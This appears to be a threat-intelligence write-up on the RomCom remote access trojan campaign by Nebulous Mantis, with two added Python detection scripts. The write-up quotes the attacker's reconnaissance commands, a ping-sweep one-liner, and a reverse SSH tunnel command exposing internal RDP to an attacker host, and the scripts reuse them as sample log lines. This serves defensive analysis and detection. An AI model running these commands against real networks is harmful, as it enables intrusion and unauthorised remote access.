Cybersecurity experts have uncovered a sophisticated espionage campaign orchestrated by the threat actor group known as Nebulous Mantis, utilizing an advanced remote access trojan called RomCom to target organizations globally.
The campaign employs deceptive spear-phishing tactics coupled with multi-stage malware deployment to establish persistent access to victim networks, exfiltrate sensitive data, and potentially enable lateral movement within compromised infrastructures.
Initial infection vectors predominantly involve spear-phishing emails containing OneDrive-themed download links that purport to offer legitimate documents such as “Situation details & Evidence_April_25.pdf.”
When unsuspecting victims click these links, they unknowingly download the initial executable of the RomCom downloader variant from Mediafire, a tactical shift from the group’s previous use of temp.sh as a file-hosting service.
Catalyst researchers identified that, upon execution, the malware employs anti-analysis mechanisms to evade detection, including filename hash verification and registry checks to determine whether it is running in a sandbox environment.
The malware specifically examines the “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs” registry key to verify if the value exceeds 55, which would be consistent with normal user activity rather than an analysis environment.
The RomCom RAT operates through a multi-stage infection process, beginning with a downloader component that injects the first-stage DLL variant into the legitimate explorer.exe process.
This DLL, written in C, establishes a connection to command and control (C2) infrastructure to download additional attack toolkits and execute commands on the compromised system.
What distinguishes this campaign is the threat actor’s innovative use of the InterPlanetary File System (IPFS) – a decentralized peer-to-peer network designed for file storage and sharing.
Instead of relying exclusively on traditional centralized C2 servers, RomCom leverages domains such as ipfs.io, hardbin.com, and dweb.link to retrieve additional payloads, making detection and takedown efforts significantly more challenging.
The infection chain involves multiple stages, with the malware utilizing specific IPNS CID addresses to connect to IPFS domains.
Once established on the victim’s system, the final stage of RomCom connects to its C2 server at opendnsapi.net to receive commands and download supplementary modules.
These modules are typically stored in the “c:\users\public” directory with filenames such as mfc86.exe, shbhost.exe, and cconsrv.exe.
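As an added defender-side example (not code from the report, from Catalyst, or from any vendor), the following Python script triages constructed proxy-log and file-creation lines for the indicators named above: requests to the three IPFS gateway domains (distinguishing /ipfs/ content fetches from mutable /ipns/ lookups), requests to the opendnsapi.net C2 domain, and executables written beneath C:\Users\Public, with the three module names called out specifically. The log layouts, client IPs, CIDs, IPNS names and paths are assumptions constructed for the example.

```python
"""Added example: triage constructed proxy and file-creation logs for the RomCom
IPFS-gateway, C2 and dropped-module indicators described in the report."""
import re
from dataclasses import dataclass

# Domains named in the report: IPFS gateways used to fetch payloads, and the final-stage C2.
IPFS_GATEWAYS = ("ipfs.io", "dweb.link", "hardbin.com")
C2_DOMAINS = ("opendnsapi.net",)
# Module names the report says are dropped under c:\users\public.
KNOWN_MODULES = {"mfc86.exe", "shbhost.exe", "cconsrv.exe"}

# Gateway paths look like /ipfs/<CID> or /ipns/<name>; both are long alphanumeric strings.
IPFS_PATH = re.compile(r"/(ipfs|ipns)/([A-Za-z0-9]{20,})", re.IGNORECASE)
# Assumed proxy-log layout: "<timestamp> <client-ip> <host> <path>".
PROXY_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<host>\S+)\s+(?P<path>\S*)")
# Assumed file-event layout (Sysmon-like): "... TargetFilename: <path> ..."
TARGET_RE = re.compile(r"TargetFilename:\s*(?P<path>\S+)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    category: str
    detail: str


def domain_matches(host, domains):
    """True if host equals one of domains or is a subdomain of it (gateway.ipfs.io matches ipfs.io)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_proxy_log(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        m = PROXY_RE.match(line)
        if not m:
            continue
        host, path = m.group("host"), m.group("path")
        if domain_matches(host, C2_DOMAINS):
            findings.append(Finding(n, "c2", host))
        elif domain_matches(host, IPFS_GATEWAYS):
            p = IPFS_PATH.search(path)
            # An /ipns/ fetch resolves a mutable name, which is the retrieval pattern the report describes.
            cat = "ipfs-gateway-ipns" if p and p.group(1).lower() == "ipns" else "ipfs-gateway"
            findings.append(Finding(n, cat, host + path))
    return findings


def scan_file_events(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        m = TARGET_RE.search(line)
        if not m:
            continue
        parts = m.group("path").replace("/", "\\").split("\\")
        name = parts[-1].lower()
        # Case-insensitive check for anything beneath C:\Users\Public (any depth).
        in_public = [p.lower() for p in parts[:3]] == ["c:", "users", "public"]
        if in_public and name in KNOWN_MODULES:
            findings.append(Finding(n, "known-module", name))
        elif in_public and name.endswith(".exe"):
            findings.append(Finding(n, "public-dir-exe", name))
    return findings


# Constructed sample input (not real telemetry); CIDs and IPNS names are placeholders.
SAMPLE_PROXY = [
    "2025-04-25T09:14:02Z 10.0.0.15 ipfs.io /ipns/k51qzi5uqu5dexamplenameconstructedforthistestonly",
    "2025-04-25T09:14:05Z 10.0.0.15 cloudflare-ipfs.com /ipfs/bafybeigdyrexampleconstructedcid0000000",
    "2025-04-25T09:16:40Z 10.0.0.15 gateway.dweb.link /ipfs/QmExampleConstructedCidForTestingOnly12345",
    "2025-04-25T09:20:11Z 10.0.0.15 opendnsapi.net /",
    "2025-04-25T09:21:00Z 10.0.0.22 www.example.com /index.html",
]
SAMPLE_FILE_EVENTS = [
    r"FileCreate TargetFilename: C:\Users\Public\mfc86.exe Image: C:\Windows\explorer.exe",
    r"FileCreate TargetFilename: C:\Users\Public\Music\sample.exe Image: C:\Windows\explorer.exe",
    r"FileCreate TargetFilename: C:\Users\alice\Downloads\report.pdf Image: C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_PROXY) + scan_file_events(SAMPLE_FILE_EVENTS):
        print(f"line {f.line_no}: {f.category} -> {f.detail}")
```

Note that the second proxy line (a gateway the report does not name) is deliberately not flagged: the gateway list is limited to the domains in the report, and a production rule would extend it with the public IPFS gateways an organisation has no business reason to reach. The file check matches any depth under C:\Users\Public, so the C:\users\public\music\sample.exe path used for the tunnel binary later in the report is caught as well.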
A distinctive feature of RomCom’s operation is its extensive reconnaissance capabilities. The malware executes a comprehensive set of commands to gather system information, including time zone data through “tzutil /g” and user details via “whoami /all” and “net localgroup administrators”.
For network discovery, it employs commands like:
for /L %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find "TTL=" >> C:\Users\Public\1.txt
This command systematically scans the local network for active hosts, storing the results for exfiltration. The malware also establishes persistence and creates remote access tunnels through techniques such as reverse SSH tunneling:
C:\users\public\music\sample.exe -hostkey SHA256:{HOSTKEY} -batch -pw "{PASSWORD}" -N -R 25671:{INFECTED_NETWORK_IP}:3389 root@{ATTACKERS_REMOTE_IP} -P 56777
This command creates a reverse tunnel mapping the attacker’s port to the internal RDP service, enabling external access to internal resources while evading traditional network security controls.
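As an added detection example (not code from the report or from any vendor), the following Python script runs rules for the three discovery commands, the batch-file ping sweep and the reverse SSH tunnel described above over constructed process-creation log lines, then escalates hosts that show either two or more distinct recon commands or a tunnel exposing RDP (port 3389). The log layout, host names, user names, IP addresses and the host-key and password placeholders are assumptions constructed for the example.

```python
"""Added example: detect the RomCom reconnaissance commands, ping sweep and reverse
SSH tunnel described in the report in constructed process-creation log lines."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Assumed log layout: "<timestamp> host=<name> user=<name> cmd=<command line>".
EVENT_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# Discovery commands quoted in the report.
RECON_PATTERNS = {
    "timezone": re.compile(r"\btzutil(?:\.exe)?\s+/g\b", re.IGNORECASE),
    "whoami-all": re.compile(r"\bwhoami(?:\.exe)?\s+/all\b", re.IGNORECASE),
    "local-admins": re.compile(r"\bnet(?:1|\.exe)?\s+localgroup\s+administrators\b", re.IGNORECASE),
}
# Batch "for /L" loop that pings a numeric range and filters replies on "TTL=", as in the report.
PING_SWEEP = re.compile(
    r'for\s+/L\s+%\w+\s+in\s*\(\s*\d+\s*,\s*\d+\s*,\s*\d+\s*\).*\bping\b.*\bfind\b\s+"TTL="',
    re.IGNORECASE)
# SSH remote port forward: -R <listen-port>:<internal-host>:<internal-port>.
REVERSE_FWD = re.compile(r"-R\s+(?P<lport>\d+):(?P<target>[\w.\-]+):(?P<tport>\d+)")
RDP_PORT = "3389"


@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    severity: str
    detail: str


def scan_events(lines):
    findings = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts, host, cmd = m.group("ts"), m.group("host"), m.group("cmd")
        for name, pat in RECON_PATTERNS.items():
            if pat.search(cmd):
                findings.append(Finding(ts, host, "recon:" + name, "low", cmd))
        if PING_SWEEP.search(cmd):
            findings.append(Finding(ts, host, "ping-sweep", "medium", cmd))
        fwd = REVERSE_FWD.search(cmd)
        if fwd:
            # Exposing the internal RDP service through an outbound SSH tunnel is the case the report describes.
            sev = "high" if fwd.group("tport") == RDP_PORT else "medium"
            detail = f"{fwd.group('lport')}->{fwd.group('target')}:{fwd.group('tport')}"
            findings.append(Finding(ts, host, "reverse-ssh-tunnel", sev, detail))
    return findings


def hosts_to_escalate(findings):
    """Hosts with two or more distinct recon commands, or any high-severity finding."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f.host].append(f)
    result = {}
    for host, fs in by_host.items():
        recon = {f.rule for f in fs if f.rule.startswith("recon:")}
        if len(recon) >= 2 or any(f.severity == "high" for f in fs):
            result[host] = sorted({f.rule for f in fs})
    return result


# Constructed sample events (not real telemetry); 203.0.113.10 is documentation address space.
SAMPLE_EVENTS = [
    r'2025-04-25T10:01:10Z host=WS-1042 user=CORP\jdoe cmd=tzutil /g',
    r'2025-04-25T10:01:12Z host=WS-1042 user=CORP\jdoe cmd=whoami /all',
    r'2025-04-25T10:01:15Z host=WS-1042 user=CORP\jdoe cmd=net localgroup administrators',
    r'2025-04-25T10:02:30Z host=WS-1042 user=CORP\jdoe cmd=cmd.exe /c for /L %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find "TTL=" >> C:\Users\Public\1.txt',
    r'2025-04-25T10:05:00Z host=WS-1042 user=CORP\jdoe cmd=C:\users\public\music\sample.exe -hostkey SHA256:HOSTKEY_PLACEHOLDER -batch -pw "PASSWORD_PLACEHOLDER" -N -R 25671:10.0.0.15:3389 root@203.0.113.10 -P 56777',
    r'2025-04-25T10:06:00Z host=WS-2001 user=CORP\asmith cmd=whoami /all',
]

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.ts} {f.host} [{f.severity}] {f.rule}: {f.detail}")
    print("escalate:", hosts_to_escalate(found))
```

A single "whoami /all" (the WS-2001 line) is left at low severity because administrators run it legitimately; it is the sequence of discovery commands on one host, followed by the sweep and the tunnel, that the escalation logic keys on. The option set in the tunnel command (-hostkey, -batch, -pw, -P) is that of PuTTY's plink, so an SSH client with those switches running from a user-writable path such as C:\users\public is itself worth a rule independent of the -R target.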